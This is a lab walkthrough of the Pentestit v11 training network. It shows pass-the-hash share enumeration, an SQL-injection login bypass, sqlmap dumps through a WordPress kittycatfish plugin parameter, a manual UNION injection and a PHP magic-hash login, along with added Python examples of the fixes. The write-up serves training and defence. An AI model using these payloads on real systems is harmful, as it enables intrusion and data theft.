Innogen security

Pentestit lab v11 Guide Part 5


Site 1 172.16.0 Hosts and Ports

Using the OpenVPN details, we now open a connection through to site 1 and begin basic port enumeration.

  • 172.16.0.10 AD: This server is a domain controller and has too many open ports to list here; however, we have a list of users and hashes, so we can potentially investigate this as an option.
  • 172.16.0.14 CUPS: Ports open:
    22/tcp open  ssh
    80/tcp open  http
  • 172.16.0.16 ACCESS CONTROL:
    22/tcp open  ssh
    80/tcp open  http
  • 172.16.0.17 ACCESS CONTROL:
    20/tcp closed ftp-data
    21/tcp open   ftp
    22/tcp open   ssh

As there is a domain controller in reach, my instinct is to attack this one first in a bid to gain higher privileges or access to more privileged information stored in AD.

AD – 172.16.0.10:

The first thing to do is to create a user list from the users we found on the SITE2 host; once done, we can fire up Metasploit and enumerate the users, as this is a fast way to validate the existence of each user in AD.

Metasploit shows arm554 is present. While reviewing the “New Text Document” for arm554 found on SITE2 we extract the NT hash, and from experience in the OSCP labs I know we can feed this into pth (pass-the-hash) tooling to enumerate the domain shares and use this as an attack vector. So, taking the information we now have, we can start attacking the AD server with the arm554 user, the NT hash and the share list from the “New Text Document”.


C:\Users\user\Old test.lab users>type "arm554\New Text Document.txt"
6361DEA164EE8FE91FE7B117FBC9CA5E

Shares:
docs
files
work
monthly

C: 20GB
D: 160 GB

Removed?

Based on the results from pth-smbclient we see the “files” share still exists for the arm554 user account. It's worth noting that the user did not have access to the remaining shares except SYSVOL and NETLOGON; however, once enumerated, no worthwhile information was extracted.


root@kali:~/scripts/python$ pth-smbclient --user=arm554 \
    --pw-nt-hash -m smb3 \
    -L 172.16.0.10 \\\\172.16.0.10\\files\\ \
    6361DEA164EE8FE91FE7B117FBC9CA5E

WARNING: The "syslog" option is deprecated
Domain=[TESTLAB] OS=[] Server=[]

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	files           Disk      
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
	Users           Disk      
Connection to 172.16.0.10 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
NetBIOS over TCP disabled -- no workgroup available

With a successful connection established via pth-smbclient using the arm554 hash, we enumerate the files share further and locate two useful items:

  • Admin credentials, with a note about ARP-poisoning software (“interceptor”) being installed on one of the DIR network servers.
  • AD Token 😀

CUPS – 172.16.0.14 port 80:

Opening the port 80 web page shows us two options:


Naturally we start with the admin panel, which prompts us for a login, so it is using .htaccess basic auth. Based on this I fire hydra at it while checking the local storage button, which gives us a basic login web page.
This means we could potentially try an SQLi-based attack, which succeeded almost immediately.

LOGIN PAGE:

  • username: admin
  • password: admin' OR '1'='1'-- -
    NOTE: in case the formatting is mangled, the ending is dash dash space dash.

Once in the local storage we see the title “Local repository of document scans”; two images stand out:

  • Oddly named image?
  • Photo of a monitor showing an RSA private key for the username “morgan”

The oddly named image turned out to be the token and required decoding from hex to a string in order to obtain the correct token; for this I used: https://conv.darkbyte.ru/

Transcribing the RSA key became a painful task of interpreting the correct characters, especially distinguishing ones, capital I and lower-case L… have fun with this one.

We are now on ROUTER…!

ssh -i ~/morgan.key morgan@172.16.0.252
Last login: Fri Jun 30 19:46:31 2017 from 172.16.0.254
##########################
PasswordAuthentication no
##########################
morgan@tl11-172-16-0-252:~$

At this point I decided to take stock of where I was in the network and what tasks had been completed. It was then noticed that we still had SITE outstanding with regard to the kittycat exploit, so SITE became the next target.


SITE – 172.16.0.11 port 80:

A ping sweep of the 172 network was done, and it was seen that SITE’s internal network interface was configured as .11; we therefore amend the exploit and retry.

Immediately it was noticed that the 403 errors ceased and, hey presto, sqlmap proved successful and I was able to obtain the SITE token from an aptly named table…
NOTE: WordPress admin credentials were also dumped; however, I was unable to crack them, unfortunately.


root@kali:~$ sqlmap --random-agent \
    -u "http://172.16.0.11/wp-content/plugins/kittycatfish-2.2/base.css.php?kc_ad=16" \
    --dbms=mysql --level=5 --risk=3 --threads 10 \
    --string="left: 50%;" --hex --dbs
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.1.6#stable}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
 mutual consent is illegal. It is the end user's 
responsibility to obey all applicable local, 
state and federal laws. Developers assume no liability and are not responsible 
for any misuse or damage caused by this program

[*] starting at 21:19:51

[21:19:51] [INFO] fetched random HTTP User-Agent header 
from file '/usr/share/sqlmap/txt/user-agents.txt': 
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050811 Firefox/1.0.6'
[21:19:51] [INFO] testing connection to the target URL
[21:19:51] [INFO] testing if the provided string is within the target 
URL page content
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: kc_ad (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: kc_ad=16 AND 6962=6962&ver=2.0

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: kc_ad=16 AND SLEEP(5)&ver=2.0
---
[21:19:51] [INFO] testing MySQL
[21:19:51] [INFO] confirming MySQL
[21:19:51] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
[21:19:51] [INFO] fetching database names
[21:19:51] [INFO] fetching number of databases
[21:19:51] [INFO] resumed: 2
[21:19:51] [INFO] retrieving the length of query output
[21:19:51] [INFO] resumed: 36
[21:19:51] [INFO] resumed: information_schema
[21:19:51] [INFO] retrieving the length of query output
[21:19:51] [INFO] resumed: 18
[21:19:51] [INFO] resumed: testlabdb
available databases [2]:
[*] information_schema
[*] testlabdb

[21:19:51] [INFO] fetched data logged to text files under 
'/home/.sqlmap/output/172.16.0.11'

[*] shutting down at 21:19:51

Dumping the TOKEN:


root@kali:~$ sqlmap --random-agent \
    -u "http://172.16.0.11/wp-content/plugins/kittycatfish-2.2/base.css.php?kc_ad=16" \
    --dbms=mysql --level=5 --risk=3 --threads 10 --string="left: 50%;" \
    --hex -D testlabdb -T tl_token --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.6#stable}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without 
prior mutual consent is illegal. It is the end user's responsibility to 
obey all applicable local, state and federal laws. Developers assume no 
liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:23:41

[21:23:41] [INFO] fetched random HTTP User-Agent header from file 
'/usr/share/sqlmap/txt/user-agents.txt': 
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 
(KHTML, like Gecko) Safari/125.8'
[21:23:41] [INFO] testing connection to the target URL
[21:23:42] [INFO] testing if the provided string is within the target 
URL page content
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: kc_ad (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: kc_ad=16 AND 6962=6962&ver=2.0

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: kc_ad=16 AND SLEEP(5)&ver=2.0
---
[21:23:42] [INFO] testing MySQL
[21:23:42] [INFO] confirming MySQL
[21:23:42] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
[21:23:42] [INFO] fetching columns for table 'tl_token' in database 'testlabdb'
[21:23:44] [INFO] retrieved: 1    
[21:23:44] [INFO] retrieving the length of query output
[21:23:47] [INFO] retrieved: 48      
[21:24:00] [INFO] retrieved: token: Site_on_dark_side                                                  
[21:24:00] [INFO] fetching entries for table 'tl_token' in database 'testlabdb'
[21:24:00] [INFO] fetching number of entries for table 'tl_token' in database 
'testlabdb'
[21:24:03] [INFO] retrieved: 1    
[21:24:03] [INFO] retrieving the length of query output
[21:24:06] [INFO] retrieved: 2    
[21:24:07] [INFO] retrieved: 1            
[21:24:07] [INFO] analyzing table dump for possible password hashes
Database: testlabdb
Table: tl_token
[1 entry]
+----------------------------+
| token: S***************e   |
+----------------------------+
| 1                          |
+----------------------------+

[21:24:07] [INFO] table 'testlabdb.tl_token' dumped to CSV file 
'/home/.sqlmap/output/172.16.0.11/dump/testlabdb/tl_token.csv'
[21:24:07] [INFO] fetched data logged to text files under 
'/home/.sqlmap/output/172.16.0.11'

[*] shutting down at 21:24:07

root@kali:~$

NOTE: I also went back and did this manually, using the following request to obtain the token:

http://172.16.0.11/wp-content/plugins/kittycatfish-2.2/base.css.php?kc_ad=16
+union+select+0x6b635f61645f637373,
group_concat(column_name)+from+information_schema.columns+
WHERE+table_name=0x746c5f746f6b656e
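Both injections in this part, the quote-breaking login bypass on the CUPS local-storage page and the boolean-based blind payload in the kittycatfish kc_ad parameter, come from the same defect: request input concatenated straight into the SQL string. The Python script below is an added example, not code from the lab, the CUPS page or the kittycatfish plugin. It uses an in-memory SQLite database with constructed sample rows to show the vulnerable query beside the parameterised one for both the quoted-string and the unquoted-integer case (SQLite does not understand MySQL's 0x… hex literals, so the manual request above is not reproduced verbatim).

```python
"""Vulnerable vs. parameterised queries, modelled on the two injections above.

Added example with an in-memory SQLite database and constructed rows; it stands
in for the pattern only and is not the CUPS login page or the plugin code.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data: one admin account and one 'ad' row with CSS."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'correct horse battery staple');
        CREATE TABLE ads (id INTEGER PRIMARY KEY, css TEXT);
        INSERT INTO ads VALUES (16, 'left: 50%;');
        """
    )
    return conn


# --- Login check (quoted string context) ---------------------------------

def login_vulnerable(conn, username: str, password: str) -> bool:
    # String formatting places the input inside the SQL grammar: a quote in the
    # password closes the literal, "OR '1'='1'" widens the WHERE clause, and
    # "-- " comments out the dangling quote the template would have appended.
    sql = "SELECT id FROM users WHERE username='%s' AND password='%s'" % (username, password)
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username: str, password: str) -> bool:
    # Bound parameters are passed as values and never parsed as SQL, so the
    # payload is compared byte-for-byte against the stored password and fails.
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# --- Ad lookup (unquoted integer context, kc_ad style) -------------------

def ad_css_vulnerable(conn, kc_ad: str):
    # No quote is needed here: "16 AND 6962=6962" is appended as-is and
    # evaluated, which is exactly the true/false signal boolean-blind SQLi uses.
    sql = "SELECT css FROM ads WHERE id = %s" % kc_ad
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def ad_css_safe(conn, kc_ad: str):
    # Validate the type before it reaches SQL, then bind it as a parameter.
    try:
        ad_id = int(kc_ad)
    except ValueError:
        return None  # reject anything that is not a plain integer
    row = conn.execute("SELECT css FROM ads WHERE id = ?", (ad_id,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    bypass = "admin' OR '1'='1'-- -"
    print("login, vulnerable :", login_vulnerable(db, "admin", bypass))
    print("login, safe       :", login_safe(db, "admin", bypass))
    print("kc_ad true cond   :", ad_css_vulnerable(db, "16 AND 6962=6962"))
    print("kc_ad false cond  :", ad_css_vulnerable(db, "16 AND 6962=6963"))
    print("kc_ad safe        :", ad_css_safe(db, "16 AND 6962=6962"))
```

The two vulnerable functions differ only in whether the injection point is quoted; the fix is the same in both cases (bind the value, and for numeric parameters validate the type first), which is why a `--string="left: 50%;"` true/false oracle stops working once the plugin binds `kc_ad`.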

We are now left with attempting to exploit the access control system and the three internal networks behind ROUTER, for which we now have ssh credentials, so the next parts will focus on those systems.

HELPDESK – 192.168.11.3:

Enumerating this host shows we have ports 22 and 80 available:

Nmap scan report for 192.168.11.3
Host is up (0.0020s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

On looking around we can get an idea of the usernames available on the platform, but nothing publicly visible in the tickets is of direct use.
Selecting edit from the top menu presents us with advice about which user accounts to use:

Based on this we try a few default passwords, including the username as the password; however, once logged in as the oper_2 user with the password oper_2, we find we cannot do anything of worth.

Running DirBuster discovered the following path: http://192.168.11.3/_admin/login.php

I decided to test this via Burp Suite’s brute forcer (including the cluster bomb attack) to no avail, and after much ado (2 evenings) I decided to cave in and ask the Telegram forum for advice/hints. I was then pointed toward the following information:

https://www.whitehatsec.com/blog/magic-hashes/

This is definitely something that I did not know, so I required the nudge in order to move forward.
Now, my theory is that as we are trying to get into a PHP page or obtain ssh credentials, I limit myself to md5 and sha1; the magic hashes on the page for these two are:

Hash   Length  Magic string  Magic hash                                 Found by
md5    32      240610708     0e462097431906509019562988736854           Michal Spacek
sha1   40      10932435112   0e07766915004133176347055865026311692244   Independently found by Michael A. Cleverly, Michele Spagnuolo and Rogdham

Now, according to the whitepaper, if it is a true magic hash then both sides should equal 0 and pass through; however, in this case it is not so straightforward, as neither worked, i.e. neither the full hash nor the magic string from either hash type.
I then got a nudge in Telegram about splitting the value, so I started with splitting the “Magic String”, as splitting the md5/sha1 hash makes no sense: trying to get the correct lengths would take an eternity.

So now we have two sets of values to test, an md5 and a sha1 magic string. Splitting them down the middle (roughly, as they are of odd rather than even length) to use as the username and password: 5 then 4 (24061 0708) and 4 then 5 (24061 0708) on the md5 failed, 6 then 5 (109324 35112) on the sha1 failed, but 5 and 6 worked:

Magic hash (split):
http://192.168.11.3/_admin/login.php?login=10932&password=435112
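As an added illustration (not code from the helpdesk application or from the linked whitehatsec post), the Python script below shows why the two magic strings from the table compare equal under PHP's loose `==` and why a strict comparison stops it. `php_loose_equals` is a simplified model of PHP's numeric-string comparison, not PHP itself; the stored hash for the sample user `alice` (md5 of "QNKCDZO", another well-known magic-hash preimage) and the user table are constructed values.

```python
"""Why a 'magic hash' passes a PHP loose comparison, and the check that stops it.

Added example: php_loose_equals() is a simplified model of PHP's '==' on two
numeric strings (they are compared as numbers), not PHP itself. A hex digest of
the form "0e<digits>" is a valid float literal with the value 0.0, so any two
such digests compare equal under '==' even though the strings differ.
"""
import hashlib
import hmac
import re

# A digest PHP reads as a number: a leading "0e" followed only by decimal digits.
MAGIC_RE = re.compile(r"^0e[0-9]+$")


def is_magic_hash(digest_hex: str) -> bool:
    """True if the hex digest parses as the float 0.0 (zero times ten to anything)."""
    return MAGIC_RE.match(digest_hex) is not None


def php_loose_equals(a: str, b: str) -> bool:
    """Model of PHP '==' for two strings: numeric strings compare as floats."""
    try:
        return float(a) == float(b)
    except ValueError:
        return a == b  # at least one side is not numeric: byte-wise compare


def php_strict_equals(a: str, b: str) -> bool:
    """Model of '===' / hash_equals(): same bytes, no numeric coercion."""
    return hmac.compare_digest(a.encode(), b.encode())


def check_password_loose(stored_hex: str, candidate: str, algo: str = "md5") -> bool:
    """The flawed pattern: if (md5($pw) == $stored). Breaks when $stored is magic."""
    digest = hashlib.new(algo, candidate.encode()).hexdigest()
    return php_loose_equals(digest, stored_hex)


def check_password_strict(stored_hex: str, candidate: str, algo: str = "md5") -> bool:
    """The fixed pattern: hash_equals($stored, md5($pw)) (or '===')."""
    digest = hashlib.new(algo, candidate.encode()).hexdigest()
    return php_strict_equals(digest, stored_hex)


def audit_stored_hashes(hashes: dict) -> list:
    """Defender check: accounts whose stored digest is itself magic, i.e. the
    ones a loose comparison would accept any magic preimage for."""
    return sorted(user for user, h in hashes.items() if is_magic_hash(h))


# Constructed sample: one user whose real password happens to hash to a magic
# value ("QNKCDZO" is a well-known md5 magic preimage), one whose does not.
SAMPLE_USERS = {
    "alice": hashlib.md5(b"QNKCDZO").hexdigest(),
    "bob": hashlib.md5(b"correct horse battery staple").hexdigest(),
}

if __name__ == "__main__":
    for algo, preimage in (("md5", "240610708"), ("sha1", "10932435112")):
        d = hashlib.new(algo, preimage.encode()).hexdigest()
        print(f"{algo}({preimage}) = {d}  magic={is_magic_hash(d)}")
    print("loose :", check_password_loose(SAMPLE_USERS["alice"], "240610708"))
    print("strict:", check_password_strict(SAMPLE_USERS["alice"], "240610708"))
    print("audit :", audit_stored_hashes(SAMPLE_USERS))
```

The audit helper is the practical takeaway for a defender: with a loose comparison in place, the exposure is limited to accounts whose stored digest already starts with "0e" and continues with digits, and switching the comparison to `hash_equals()` (or `===`) removes it for all of them.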

I will certainly need to learn more about this topic in order to understand it fully and to understand any further exploits that come out in this area; for now, the two nudges got me to the point of admin, and the required helpdesk TOKEN followed:

John Username and Token:

We also gain ssh details for a user john.


PART 6: